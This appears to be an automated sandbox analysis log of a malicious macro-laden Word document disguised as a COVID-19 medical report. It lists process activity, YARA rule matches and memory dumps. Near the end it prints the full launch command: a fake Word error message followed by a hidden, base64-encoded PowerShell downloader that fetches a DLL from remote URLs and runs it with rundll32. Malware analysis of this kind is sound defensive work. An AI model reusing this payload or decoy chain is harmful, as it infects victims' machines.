Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EC19E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E2FF8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F43CB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F8225
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F2433
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ECA31
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E9E02
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EE800
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E6212
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E1013
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E1673
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F6C51
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EA8AE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EAEA0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F14BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002FA29B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F9494
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F0E90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EEEC4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F88C2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E5EDF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E2CDA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F1AD1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EEB26
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E4B26
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EFD22
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E3F0E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F410D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EF908
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F1108
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E6509
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E196F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E6F7B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F915E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F15AF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E93AD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E87AA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EB7BC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F21B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F0B86
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EBF80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E4390
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E71EC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EF1ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EE1E9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E8FE5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EC3FE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002EAFF9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E45F9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E1BF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ECDF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E83F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F7FCC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002E97DE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ED7D7
Source: GT-9333 Medical report COVID-19.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Dk5att0cu_9jsb, Function Document_open
Source: GT-9333 Medical report COVID-19.docOLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10004D10 appears 33 times
Source: Chpieog.dll.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 00000005.00000002.2112271033.0000000000326000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2112362242.0000000001B54000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.evad.winDOC@12/9@5/6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002F90E0 CreateToolhelp32Snapshot,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$-9333 Medical report COVID-19.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCA7F.tmpJump to behavior
Source: GT-9333 Medical report COVID-19.docOLE indicator, Word Document stream: true
Source: GT-9333 Medical report COVID-19.docOLE document summary: title field not present or empty
Source: GT-9333 Medical report COVID-19.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exeConsole Write: ............)........................... .?.......?...............).....X.).............#...............................h.......5kU.......).....
Source: C:\Windows\System32\msg.exeConsole Write: ............)...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........).....L.................).....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................&.j......................P.............}..v............0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................&.j..... P...............P.............}..v............0.{...............|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.>.....................t&.j......................P.............}..v............0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................t&.j......|...............P.............}..v....p.......0.{.............H.|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................&.j......C...............P.............}..v.....P......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................&.j..... P...............P.............}..v.....P......0.{...............|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j.....J|...............P.............}..v............0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............4..j....x.................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j.....J|...............P.............}..v............0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............4..j....x.................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....J|...............P.............}..v............0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............4..j....x.................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.{.............hG|.....(.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[...............4..j......................P.............}..v....H.......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.6.............}..v....X.......0.{.............hG|.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X#......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....$................P.............}..v.....$......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X+......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....,................P.............}..v.....,......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X3......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....4................P.............}..v.....4......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X;......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.>.....................4..j.....<................P.............}..v.....<......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....XC......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....D................P.............}..v.....D......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....XK......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....L................P.............}..v.....L......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....XS......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....T................P.............}..v.....T......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X[......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....\................P.............}..v.....\......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....Xc......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....d................P.............}..v.....d......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....Xk......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....l................P.............}..v.....l......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....Xs......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....t................P.............}..v.....t......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X{......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....|................P.............}..v.....|......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X#......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....$................P.............}..v.....$......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J|...............P.............}..v....X+......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....,................P.............}..v.....,......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j.....J|...............P.............}..v.....1......0.{.....................t.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............4..j.....2................P.............}..v.....3......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j.....J|...............P.............}..v.....9......0.{.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............4..j....x:................P.............}..v.....:......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j.....J|...............P.............}..v....H@......0.{.....................r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............4..j.....A................P.............}..v.....A......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G....... ..........j.....J|...............P.............}..v.....E......0.{.............hG|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............4..j.....E................P.............}..v....HF......0.{..............H|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.{.............................h.X..... .........P.............}..v......'..... .................|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................P.............}..v......'.....0.{...............|.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: GT-9333 Medical report COVID-19.docReversingLabs: Detection: 25%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
